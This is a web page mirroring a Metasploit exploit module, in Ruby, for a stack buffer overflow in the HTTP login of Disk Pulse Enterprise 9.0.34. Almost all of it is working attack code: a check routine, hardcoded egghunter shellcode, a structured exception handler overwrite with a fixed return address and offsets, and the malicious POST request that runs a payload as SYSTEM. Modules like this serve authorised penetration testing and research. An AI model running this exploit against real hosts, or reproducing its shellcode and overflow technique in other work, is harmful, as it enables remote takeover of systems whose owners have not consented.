Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb
19567 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::Remote::Egghunter
11
include Msf::Exploit::Remote::Seh
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Disk Pulse Enterprise Login Buffer Overflow',
18
'Description' => %q{
19
This module exploits a stack buffer overflow in Disk Pulse Enterprise
20
9.0.34. If a malicious user sends a malicious HTTP login request,
21
it is possible to execute a payload that would run under the Windows
22
NT AUTHORITY\SYSTEM account. Due to size constraints, this module
23
uses the Egghunter technique.
24
},
25
'License' => MSF_LICENSE,
26
'Author' => [
27
'Chris Higgins', # msf Module -- @ch1gg1ns
28
'Tulpa Security' # Original discovery -- @tulpa_security
29
],
30
'References' => [
31
[ 'EDB', '40452' ]
32
],
33
'DefaultOptions' => {
34
'EXITFUNC' => 'thread'
35
},
36
'Platform' => 'win',
37
'Payload' => {
38
'BadChars' => "\x00\x0a\x0d\x26"
39
},
40
'Targets' => [
41
[
42
'Disk Pulse Enterprise 9.0.34',
43
{
44
'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll
45
'Offset' => 12600
46
}
47
],
48
],
49
'Privileged' => true,
50
'DisclosureDate' => '2016-10-03',
51
'DefaultTarget' => 0,
52
'Notes' => {
53
'Reliability' => UNKNOWN_RELIABILITY,
54
'Stability' => UNKNOWN_STABILITY,
55
'SideEffects' => UNKNOWN_SIDE_EFFECTS
56
}
57
)
58
)
59
60
register_options([Opt::RPORT(80)])
61
end
62
63
def check
64
res = send_request_cgi({
65
'uri' => '/',
66
'method' => 'GET'
67
})
68
69
if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.0\.34/
70
return Exploit::CheckCode::Appears
71
end
72
73
return Exploit::CheckCode::Safe
74
end
75
76
def exploit
77
connect
78
eggoptions =
79
{
80
:checksum => true,
81
:eggtag => "w00t"
82
}
83
84
print_status("Generating exploit...")
85
86
sploit = "username=admin"
87
sploit << "&password=aaaaa\r\n"
88
89
# Would like to use generate_egghunter(), looking for improvement
90
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
91
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
92
93
sploit << rand_text(target['Offset'] - payload.encoded.length)
94
sploit << "w00tw00t"
95
sploit << payload.encoded
96
sploit << make_nops(70)
97
sploit << rand_text(1614)
98
# Would like to use generate_seh_record(), looking for improvement
99
sploit << "\x90\x90\xEB\x0B"
100
sploit << "\x33\xA3\x01\x10"
101
sploit << make_nops(20)
102
sploit << egghunter
103
sploit << make_nops(7000)
104
105
# Total exploit size should be 21747
106
print_status("Total exploit size: " + sploit.length.to_s)
107
print_status("Triggering the exploit now...")
108
print_status("Please be patient, the egghunter may take a while...")
109
110
res = send_request_cgi({
111
'uri' => '/login',
112
'method' => 'POST',
113
'content-type' => 'application/x-www-form-urlencoded',
114
'content-length' => '17000',
115
'data' => sploit
116
})
117
118
handler
119
disconnect
120
end
121
end
122
123